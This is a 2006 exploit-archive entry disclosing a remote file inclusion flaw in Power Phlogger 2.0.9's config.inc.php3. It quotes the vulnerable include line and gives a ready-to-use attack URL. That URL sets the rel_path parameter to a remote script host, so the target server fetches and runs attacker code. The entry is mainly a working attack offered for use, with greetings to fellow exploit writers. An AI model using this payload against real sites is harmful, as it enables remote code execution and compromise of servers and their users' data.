[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability
# Published : 2006-10-19
# Author : x_w0x
# Previous Title : Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability
# Next Title : phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability
#################################
# Power Phlogger 2.0.9 - #
#################################
#Class: Remote|Local File Include Vulnerability
# Remote: Yes
# Local: No
# Type: High
# Site: http://www.comscripts.com/scripts/php.power-phlogger.211.html #
# Author: x_w0x
# Contact: x_w0x@hotmail.com
###################################
#Vuln Code
(config.inc.php3):
<?php
include $rel_path."functions.php3";//nothing here
?>
#
http://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt
#Gr¡ê¡êtz:makoki, azzcoder,xoron,osm@n
#Speciale gr¡ê¡êtz: str0ke, and elite-team
# www.Syue.com [2006-10-19]